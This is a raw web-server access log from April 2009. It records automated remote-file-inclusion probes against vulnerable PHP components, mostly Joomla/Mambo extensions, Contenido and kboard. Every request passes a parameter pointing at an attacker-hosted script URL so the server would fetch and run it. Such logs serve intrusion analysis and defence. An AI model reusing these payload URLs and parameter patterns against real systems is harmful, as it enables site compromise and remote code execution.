168.209.97.34 - - [27/Apr/2009:07:46:03 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:07:46:03 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
77.222.131.35 - - [27/Apr/2009:07:46:14 -0500] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.radioaktivnost.si/ewsmambo/fx29id2.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
77.222.131.35 - - [27/Apr/2009:07:46:14 -0500] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.radioaktivnost.si/ewsmambo/fx29id2.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
77.222.131.35 - - [27/Apr/2009:07:46:14 -0500] "GET /logs/access_log.1235433600/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.radioaktivnost.si/ewsmambo/fx29id2.txt??? HTTP/1.1" 404 385 "-""Mozilla/5.0"
62.149.18.33 - - [27/Apr/2009:07:46:29 -0500] "GET /logs/access_log.1239321600/joomla/index.php?option=com_restaurante&task=http://www.irisjobstation.com/peruzaklaknat/scan4/fx29id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
86.109.98.47 - - [27/Apr/2009:07:46:56 -0500] "GET /logs/errors.php?error=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
86.109.98.47 - - [27/Apr/2009:07:46:56 -0500] "GET /errors.php?error=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
168.209.97.34 - - [27/Apr/2009:07:46:58 -0500] "GET /logs/access_log.1239667200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
86.109.98.47 - - [27/Apr/2009:07:47:25 -0500] "GET /logs/errors.php?error=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
86.109.98.47 - - [27/Apr/2009:07:47:25 -0500] "GET /errors.php?error=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
77.222.131.35 - - [27/Apr/2009:07:47:29 -0500] "GET /logs/access_log.1235260800/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.radioaktivnost.si/ewsmambo/fx29id2.txt??? HTTP/1.1" 404 385 "-""Mozilla/5.0"
69.64.34.249 - - [27/Apr/2009:07:47:48 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bluebrad.com/idx33xid.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
69.64.34.249 - - [27/Apr/2009:07:47:48 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bluebrad.com/idx33xid.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
74.55.30.194 - - [27/Apr/2009:07:50:38 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
74.55.30.194 - - [27/Apr/2009:07:50:38 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.55.30.194 - - [27/Apr/2009:07:50:38 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.55.30.194 - - [27/Apr/2009:07:51:05 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.55.30.194 - - [27/Apr/2009:07:51:05 -0500] "GET /logs/access_log.1239321600//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.55.30.194 - - [27/Apr/2009:07:51:08 -0500] "GET /logs/access_log.1239235200//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:07:53:22 -0500] "GET /logs//////////?mosConfig_absolute_path=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 200 187164 "-""libwww-perl/5.79"
203.97.95.186 - - [27/Apr/2009:07:53:35 -0500] "GET //////////?mosConfig_absolute_path=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 200 3253 "-""libwww-perl/5.79"
212.62.95.35 - - [27/Apr/2009:07:54:13 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://community.creativity.edu.tw/uploads/idomila.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
212.62.95.35 - - [27/Apr/2009:07:54:14 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://community.creativity.edu.tw/uploads/idomila.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
212.62.95.35 - - [27/Apr/2009:07:54:22 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://community.creativity.edu.tw/uploads/idomila.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
212.62.95.35 - - [27/Apr/2009:07:54:23 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://community.creativity.edu.tw/uploads/idomila.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
212.62.95.35 - - [27/Apr/2009:07:54:47 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://community.creativity.edu.tw/uploads/idomila.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
212.62.95.35 - - [27/Apr/2009:07:54:47 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://community.creativity.edu.tw/uploads/idomila.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
212.62.95.35 - - [27/Apr/2009:07:54:59 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://community.creativity.edu.tw/uploads/idomila.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
212.62.95.35 - - [27/Apr/2009:07:55:00 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://community.creativity.edu.tw/uploads/idomila.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
121.165.73.157 - - [27/Apr/2009:07:56:16 -0500] "GET //technote7//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
121.165.73.157 - - [27/Apr/2009:07:56:16 -0500] "GET /logs//technote7//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.165.73.157 - - [27/Apr/2009:07:56:16 -0500] "GET /logs/access_log.1235174400//technote7//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
121.165.73.157 - - [27/Apr/2009:07:56:24 -0500] "GET /logs/access_log.1233792000//technote7//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
70.247.250.222 - - [27/Apr/2009:07:57:01 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
70.247.250.222 - - [27/Apr/2009:07:57:02 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
70.247.250.222 - - [27/Apr/2009:07:57:08 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
81.176.226.100 - - [27/Apr/2009:07:59:04 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
81.176.226.100 - - [27/Apr/2009:07:59:04 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
207.210.208.136 - - [27/Apr/2009:07:59:34 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
207.210.208.136 - - [27/Apr/2009:07:59:34 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
207.210.208.136 - - [27/Apr/2009:07:59:34 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
207.210.208.136 - - [27/Apr/2009:07:59:39 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
70.247.250.222 - - [27/Apr/2009:08:00:10 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
70.247.250.222 - - [27/Apr/2009:08:00:10 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
70.247.250.222 - - [27/Apr/2009:08:00:11 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
217.172.186.250 - - [27/Apr/2009:08:01:31 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
217.172.186.250 - - [27/Apr/2009:08:01:31 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
217.172.186.250 - - [27/Apr/2009:08:01:31 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
217.172.186.250 - - [27/Apr/2009:08:02:03 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
85.25.4.51 - - [27/Apr/2009:08:02:08 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
85.25.4.51 - - [27/Apr/2009:08:02:08 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
85.25.4.51 - - [27/Apr/2009:08:02:08 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.25.4.51 - - [27/Apr/2009:08:04:04 -0500] "GET /logs/access_log.1239062400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
216.104.37.122 - - [27/Apr/2009:08:04:21 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.825"
216.104.37.122 - - [27/Apr/2009:08:04:21 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.825"
200.213.0.1 - - [27/Apr/2009:08:05:59 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
200.213.0.1 - - [27/Apr/2009:08:06:00 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
200.213.0.1 - - [27/Apr/2009:08:06:04 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
200.213.0.1 - - [27/Apr/2009:08:06:04 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
74.55.30.194 - - [27/Apr/2009:08:08:41 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.55.30.194 - - [27/Apr/2009:08:08:41 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.55.30.194 - - [27/Apr/2009:08:08:41 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
202.62.61.45 - - [27/Apr/2009:08:10:59 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/data/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
202.62.61.45 - - [27/Apr/2009:08:10:59 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/data/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
202.62.61.45 - - [27/Apr/2009:08:11:39 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/data/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
202.62.61.45 - - [27/Apr/2009:08:11:39 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/data/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
74.55.30.194 - - [27/Apr/2009:08:11:45 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.55.30.194 - - [27/Apr/2009:08:11:46 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.55.30.194 - - [27/Apr/2009:08:11:46 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/scan.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
89.186.1.54 - - [27/Apr/2009:08:11:46 -0500] "GET /logs//componets/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.186.1.54 - - [27/Apr/2009:08:11:46 -0500] "GET /logs/access_log.1239321600//componets/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
89.186.1.54 - - [27/Apr/2009:08:11:46 -0500] "GET //componets/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
69.94.109.230 - - [27/Apr/2009:08:15:01 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.803"
69.94.109.230 - - [27/Apr/2009:08:15:01 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
203.97.95.186 - - [27/Apr/2009:08:16:43 -0500] "GET //components/errors.php?error=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:08:16:43 -0500] "GET /logs/access_log.1235174400//components/errors.php?error=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:08:16:44 -0500] "GET /logs/access_log.1235174400//components/errors.php?error=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:08:16:46 -0500] "GET /logs//components/errors.php?error=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:08:16:47 -0500] "GET /logs//components/errors.php?error=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:08:16:47 -0500] "GET //components/errors.php?error=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.104.37.122 - - [27/Apr/2009:08:19:04 -0500] "GET /logs//errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.825"
216.104.37.122 - - [27/Apr/2009:08:19:05 -0500] "GET //errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.825"
202.67.153.114 - - [27/Apr/2009:08:20:46 -0500] "GET /logsupgrade_album.php?GALLERY_BASEDIR=xoopsgalleryhttp://vipsbr.50webs.com/test.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
83.226.185.169 - - [27/Apr/2009:08:21:21 -0500] "GET /logs/access_log.1235174400//image_upload.php?sbp=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.226.185.169 - - [27/Apr/2009:08:21:21 -0500] "GET //image_upload.php?sbp=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.226.185.169 - - [27/Apr/2009:08:21:21 -0500] "GET /logs//image_upload.php?sbp=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.247.51.18 - - [27/Apr/2009:08:22:53 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.vueltacarnero.com//////////modules/Roseid.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
213.247.51.18 - - [27/Apr/2009:08:22:53 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.vueltacarnero.com//////////modules/Roseid.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
83.226.185.169 - - [27/Apr/2009:08:23:20 -0500] "GET //image_upload.php?sbp=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.226.185.169 - - [27/Apr/2009:08:23:20 -0500] "GET /logs//image_upload.php?sbp=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.226.185.169 - - [27/Apr/2009:08:23:20 -0500] "GET /logs/access_log.1235174400//image_upload.php?sbp=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.226.185.169 - - [27/Apr/2009:08:24:08 -0500] "GET /logs/access_log.1235174400//image_upload.php?sbp=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
83.226.185.169 - - [27/Apr/2009:08:24:08 -0500] "GET //image_upload.php?sbp=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
83.226.185.169 - - [27/Apr/2009:08:24:08 -0500] "GET /logs//image_upload.php?sbp=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
83.226.185.169 - - [27/Apr/2009:08:24:33 -0500] "GET //image_upload.php?sbp=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.226.185.169 - - [27/Apr/2009:08:24:33 -0500] "GET /logs/access_log.1235174400//image_upload.php?sbp=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.226.185.169 - - [27/Apr/2009:08:24:33 -0500] "GET /logs//image_upload.php?sbp=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
217.147.30.80 - - [27/Apr/2009:08:24:39 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.1" 200 187156 "-""libwww-perl/5.79"
217.147.30.80 - - [27/Apr/2009:08:24:39 -0500] "GET //?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
149.156.18.19 - - [27/Apr/2009:08:24:58 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
217.147.30.80 - - [27/Apr/2009:08:25:02 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.1" 200 187156 "-""libwww-perl/5.79"
217.147.30.80 - - [27/Apr/2009:08:25:04 -0500] "GET //?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
149.156.18.19 - - [27/Apr/2009:08:25:05 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
206.104.21.154 - - [27/Apr/2009:08:26:33 -0500] "GET /logs/setup.php?dir=http://www.mjswimgear.dk/joomla/administrator/modules/fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
206.104.21.154 - - [27/Apr/2009:08:26:33 -0500] "GET /setup.php?dir=http://www.mjswimgear.dk/joomla/administrator/modules/fx29id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
206.104.21.154 - - [27/Apr/2009:08:26:33 -0500] "GET /logs/access_log.1234828800/setup.php?dir=http://www.mjswimgear.dk/joomla/administrator/modules/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
206.104.21.154 - - [27/Apr/2009:08:26:33 -0500] "GET /logs/access_log.1235260800/setup.php?dir=http://www.mjswimgear.dk/joomla/administrator/modules/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
195.116.31.151 - - [27/Apr/2009:08:26:56 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
195.116.31.151 - - [27/Apr/2009:08:26:56 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://lovesex.altervista.org/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
